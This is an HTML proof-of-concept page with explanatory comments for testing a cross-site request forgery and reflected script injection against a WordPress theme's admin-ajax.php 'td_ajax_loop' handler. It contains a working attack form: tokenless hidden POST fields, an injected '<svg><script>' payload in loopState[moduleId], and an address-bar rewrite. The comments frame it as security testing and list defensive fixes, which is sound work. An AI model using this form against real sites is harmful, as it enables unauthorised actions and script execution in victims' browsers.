CSRF.html
<!--
  Proof-of-concept page for a cross-site request forgery (CSRF) test against a
  WordPress AJAX endpoint. Submitting the form sends a cross-site POST to
  admin-ajax.php on the site under test, selecting the `td_ajax_loop` action
  and passing a `loopState` array as ordinary form fields.

  None of the fields below carries a nonce or other anti-CSRF token, so a
  handler that accepts this request is not verifying one.
  NOTE(review): the handler's code is not shown here; confirm both findings
  (missing request verification, unescaped reflection of moduleId) against it.

  Defensive takeaways for the handler:
    * verify a nonce before acting (WordPress: check_ajax_referer /
      wp_verify_nonce) and reject requests that lack one;
    * treat loopState[moduleId] as an identifier: validate it against an
      allowlist of known module names instead of echoing it;
    * escape every loopState value on output (esc_html / esc_attr);
    * log and alert on POSTs to admin-ajax.php whose loopState fields contain
      markup characters, or that arrive with a foreign Origin/Referer.
-->
<html>
<body>
<!-- Rewrites the path shown in the address bar to "/" without reloading the page; it has no effect on the request that the form sends. -->
<script>history.pushState('', '', '/')</script>
<!-- `target.com` is a placeholder for the site under test. The form uses POST, matching how the AJAX action is normally invoked. -->
<form action="target.com/wp-admin//admin-ajax.php" method="POST">
<!-- Selects which registered AJAX handler admin-ajax.php dispatches to. -->
<input type="hidden" name="action" value="td_ajax_loop" />
<input type="hidden" name="loopState[sidebarPosition]" value="" />
<!-- Test marker: markup placed in a field that should only hold a module identifier. `&#40;` is the character reference for `(`. If the response renders a prompt showing document.domain, the value was reflected without escaping. -->
<input type="hidden" name="loopState[moduleId]" value="<svg><script>prompt&#40;document.domain)</script>" />
<!-- Remaining loopState fields look like pagination/query state; presumably copied from a captured legitimate request (TODO confirm). -->
<input type="hidden" name="loopState[currentPage]" value="2" />
<input type="hidden" name="loopState[max_num_pages]" value="4" />
<input type="hidden" name="loopState[atts][category_id]" value="479" />
<input type="hidden" name="loopState[atts][offset]" value="2" />
<input type="hidden" name="loopState[ajax_pagination_infinite_stop]" value="3" />
<input type="hidden" name="loopState[server_reply_html_data]" value="" />
<!-- Manual submit: no script on this page submits the form, so nothing is sent until the button is clicked. -->
<input type="submit" value="Submit request" />
</form>
</body>
</html>